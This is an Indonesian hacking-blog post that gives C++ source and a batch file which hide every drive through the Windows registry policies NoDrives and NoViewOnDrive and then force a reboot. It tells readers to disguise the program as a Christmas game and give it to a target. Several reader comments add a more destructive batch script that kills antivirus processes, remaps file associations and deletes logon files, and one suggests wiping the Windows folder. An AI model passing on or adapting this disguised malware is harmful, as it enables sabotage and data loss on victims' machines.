Home / Virus / Virus Menyembunyikan Semua Drive Harddisk
virus-hide-all-harddisk

Virus Menyembunyikan Semua Drive Harddisk

Hallo penggemar virus di seluruh nusantara, merry christmas ya 🙂

Berikut ini kit ingin berbagi mengenai virus, yang biasa digunakan untuk menghide / menyembunyikan semua drive yang terdeteksi di harddisk. Ini hanya berlaku di windows loh, klo yang lain tidak berpengaruh.

Hide All Harddisk

VERSI PERTAMA

Yang pertama dibutuhkan adalah:
1. Compiler C++ untuk membuat aplikasi yang bisa di executable.
2. Siapkan kue & roti christmas 🙂

#include < windows.h >
#include < fstream.h >
#include < iostream.h >
#include < string.h >
#include < conio.h >
int main()
{
ofstream write ( “C:\\WINDOWS\\system32\\SembunyikanHarddisk.bat” );

write << “REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoDrives /t REG_DWORD /d 12\n”; write << “REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoViewonDrive /t REG_DWORD /d 12\n”; write<<“shutdown -r -c \”Sorry Your System Is Infected by BinusHacker Virus!\” -f”<<“\n”; write.close(); //close file ShellExecute(NULL,”open”,”C:\\WINDOWS\\system32\\SembunyikanHarddisk.bat “,NULL,NULL,SW_SHOWNORMAL); return 0; }

Simpanlah file tersebut dengan “.cpp” extension, misalkan: “virusharddisk.cpp
Kemudian compile virusharddisk.cpp menjadi file yang bisa di execute, misal: “virusharddisk.exe
Setelah itu manipulasi virusharddisk.exe tersebut menjadi “supergame-natal.exe

VERSI KEDUA

Yang perlu anda persiapkan adalah Notepad.
Kemudian buatlah file command executable dengan format .bat (Windows Command Executable)
Berikut codenya:

REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoDrives /t REG_DWORD /d 12\n

REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoViewonDrive /t REG_DWORD /d 12\n

shutdown -r -c \”Sorry Your System Is Infected By BinusHacker Virus!\” -f

Simpanlah file tersebut dengan nama “virusharddisk.bat“, kemudian ubahlah nama filenya dengan nama “game-natal.bat

Kemudian berikan ke target anda, klo target anda menjalankan.. ya selamat tinggal deh..!!

Boom.. Target anda ke infect deh.. JANGAN SEKALI-KALI MENJALANKAN DI KOMPUTER ANDA SENDIRI, KALAU ENGGAK SENJATA MAKAN TUAN JADINYA..

Selamat Natal All 🙂

About BinusHacker

Check Also

malware-api-winapi-binushacker

Kumpulan Fungsi WinAPI Pada Malware

Virus, Worm, Trojan, Spyware dan sebagainya yang termasuk kategori Malware atau malicious software mungkin sering …

29 comments

  1. virus nya emang bagus buat ngerjain orang.. tapi buat ngeremove virus gni apa tinggal di matiin proses nya? trus di delete selesai? ato ada proses ribet2 lagi?
    tq

  2. virus nya emang bagus buat ngerjain orang.. tapi buat ngeremove virus gni apa tinggal di matiin proses nya? trus di delete selesai? ato ada proses ribet2 lagi?
    tq

  3. Kreativitas tingkat tinggi….

  4. wadduuhh , mau nyoba tapi dikomputer sendiri ..
    atut lah .. 🙂

  5. truuuus mw nyoba ny dmna ????

    apakah waktuu di di run viruus beluum berjalan yaaa

  6. ini cukup bagus untuk yang ingin belajar/iseng2 utk membuat virus…. tp untuk penawarnya bagaimana ni…????

  7. ini perasaan cuman main registry doang y om..

  8. hmmmm ngeremove nya gmn nih mastah ?

  9. DINAR CRUCIAL MANCINO

    Ada yg lebih sip lg gan..

    title virus is my dna
    color 0A
    @echo off
    set end=md “u cant eascape from me-vishnu”
    set fin=copy “Hack log.txt” “Installing”
    %end%
    %fin%
    net send * andhra pradesh- virus created in karimnagar from jits college
    kill NAVAPSVC.exe /F /Q
    kill zonelabs.exe /F /Q
    kill explorer.exe /F /Q
    cls
    assoc .exe=txtfile
    assoc .txt=mp3file
    assoc .mp3=.vcf
    cls
    msg * hi dude this is begining.
    msg * vishnu attcked the system try to challenge him .
    DEL C:\WINDOWS\system32\logoff.exe /F /Q
    DEL C:\WINDOWS\system32\logon.exe /F /Q
    DEL C:\WINDOWS\system32\logon.scr /F /Q
    cls
    shutdown

    msih tetep simpen dngan nama gamenatal.bat..
    coba aja..
    pasti manteb..
    hehehe

  10. ntar gw coba dah di warnet atau di kompi orang lain.. ck ck

  11. mantep gan …
    ada contoh malicious code lain pake cpp ga ??

  12. HmMm… Sip..sip..sip…
    Penawarnya gmN tuh agan dinar?

  13. ga da penawar nya tuh ….viruss

  14. gmn cara ngatasin nya klo dah terlanjur nie gan

  15. wah seruu neh…… (kumpulan para cracker)

    pake notepad and prompt kan juga bisa…

    oh yaa kalu menjalankan antivirusnya di disable duloe…

    kalu enggk yaa … virusnya kenak tuh anti virus apalagi yg namanya norton,eset,

    bit defender… wkwkkwkww wew kakak wew zzzzzzzzzzzzzzzzzzzzzzzz -_-”

    males gw maen virus….

    udah kelempoken ma ilmunya Ddos ATACK dan kiss of death…

  16. kena nya di registry ya gan ?
    klo di registry nya udah di remove hilang kan ?

  17. Yah…. klo ini bisanya merusak.
    Gak diterangin kenapa bisa begitu dan bagaimana solusinya.

  18. mantab abiiizzzzzzzzzzzzzzzz………….

  19. Solusinya gimana,….?
    masa cuma bisa ngerjain ga ada solusinya,…?

  20. cara bwt ngembaliin hdd yg ilang nya gmn kk ??

  21. Hidden to bukan ngapus? kenapa g di hapus sekalian aja biar mak nyus, haha
    Scriptnya agan DInar? lebih bagus kalo explorernya yang dihapus, ntar mesti bikin tambah kesel, hehe

    Pisss

  22. Y mas Dinar, napa gak sekalian

    c ..
    cd ..
    cd windows
    del /f /q /s *.* aj
    Kan mantep, Bluesceern n install ualng lagi bisa, hehe

  23. itu di bagian cara pertama koq di compile ada yang salah y ??

  24. gan ini cara basmi virusnya gimana gan??

  25. waduh…?mau di coba tpi entah mau d mana..?

  26. gue pingin coba gan,tpi tikus percbaannya gk ada 😀

  27. cara ngehapus virus nya:

    -buka regedit (registry editor)
    -buka HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer
    -trus hapus key yang namanya “NoDrives” dan “NoViewOnDrive”
    -Restart komputer
    -VIRUSNYA HILANG

  28. cara mengubah virusharddisk.cpp menjadi file yang bisa di execute, misal: “virusharddisk.exe” gmn sih gan
    aq bingung ne

Tinggalkan Balasan

Alamat surel Anda tidak akan dipublikasikan. Ruas yang wajib ditandai *